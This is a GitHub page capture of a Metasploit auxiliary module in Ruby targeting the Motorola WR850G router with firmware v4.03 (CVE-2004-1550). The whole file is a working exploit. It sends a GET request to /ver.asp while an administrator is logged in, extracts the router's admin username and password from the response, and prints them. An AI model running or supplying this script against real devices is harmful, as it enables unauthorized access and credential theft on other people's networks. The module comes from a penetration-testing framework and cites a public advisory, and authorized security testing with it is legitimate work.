Skip to content
This repository
branch: master
Fetching contributors…

Cannot retrieve contributors at this time

file 60 lines (48 sloc) 1.635 kb
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Motorola WR850G v4.03 Credentials',
      'Description' => %q{
Login credentials to the Motorola WR850G router with
firmware v4.03 can be obtained via a simple GET request
if issued while the administrator is logged in. A lot
more information is available through this request, but
you can get it all and more after logging in.
},
      'Author' => 'kris katterjohn',
      'License' => MSF_LICENSE,
      'References' => [
          [ 'CVE', '2004-1550' ],
          [ 'OSVDB', '10232' ],
          [ 'URL', 'http://seclists.org/bugtraq/2004/Sep/0339.html'],
      ],
      'DisclosureDate' => 'Sep 24 2004'))

    register_options([
      Opt::RPORT(80)
    ])
  end

  def run
    connect

    sock.put("GET /ver.asp HTTP/1.0\r\n\r\n")
    response = sock.get_once

    disconnect

    if response.nil? or response.empty?
      print_status("No response from server")
      return
    end

    # 302 Redirect
    if response.split(/\r\n/)[0] !~ /200 Ok/
      print_status("Administrator not logged in")
      return
    end

    user = $1 if response.match("http_username=([^\n]*)<br>")
    pass = $1 if response.match("http_passwd=([^\n]*)<br>")

    print_status("Found username \"#{user}\" and password \"#{pass}\"") if user and pass
  end
end
Something went wrong with that request. Please try again.